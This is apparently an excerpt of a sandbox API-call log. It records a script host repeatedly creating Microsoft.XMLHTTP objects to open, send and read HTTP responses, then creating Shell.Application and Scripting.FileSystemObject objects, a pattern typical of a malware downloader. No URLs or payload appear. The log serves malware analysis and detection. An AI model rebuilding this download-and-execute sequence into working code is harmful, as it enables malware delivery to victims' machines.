	[0654.314] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0654.314] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0654.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0654.314] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0654.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.314] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0654.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0654.315] longjmp () 
	[0654.315] longjmp () 
	[0654.315] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0654.315] SysStringLen (param_1=0x0) returned 0x0
	[0654.315] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0654.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0654.315] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0654.315] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0654.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0654.315] ??2@YAPEAX_K@Z () returned 0x62f310
	[0654.315] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0654.315] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0654.315] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0654.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0654.315] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0654.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.316] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0654.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0654.316] longjmp () 
	[0654.316] longjmp () 
	[0654.316] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0654.316] SysStringLen (param_1=0x0) returned 0x0
	[0654.316] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0654.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0654.316] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0654.316] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0654.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0654.316] ??2@YAPEAX_K@Z () returned 0x62f330
	[0654.316] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0654.316] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0654.316] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0654.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0654.317] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0654.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.317] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0654.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0654.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.317] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0654.317] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0658.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0658.050] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0658.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0658.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0658.050] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0658.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0658.050] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0658.051] SysStringLen (param_1=0x0) returned 0x0
	[0658.051] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0658.051] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0658.051] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0658.051] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0658.051] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0658.051] ??2@YAPEAX_K@Z () returned 0x62f350
	[0658.051] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0658.051] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0658.051] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0658.051] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0658.051] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0658.052] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0658.052] SysStringLen (param_1=0x0) returned 0x0
	[0658.052] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0658.055] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0658.055] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0658.055] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0658.055] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0658.055] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0658.055] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0660.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0660.251] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0660.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0660.253] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0660.253] SysStringLen (param_1=0x0) returned 0x0
	[0660.253] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0660.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0660.253] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0660.253] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0660.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0660.253] ??2@YAPEAX_K@Z () returned 0x62f330
	[0660.253] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0660.253] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0660.253] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0660.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0660.253] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0660.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0660.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0660.256] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0660.256] SysStringLen (param_1=0x0) returned 0x0
	[0660.256] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0660.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0660.256] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0660.256] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0660.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0660.256] ??2@YAPEAX_K@Z () returned 0x62f310
	[0660.256] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
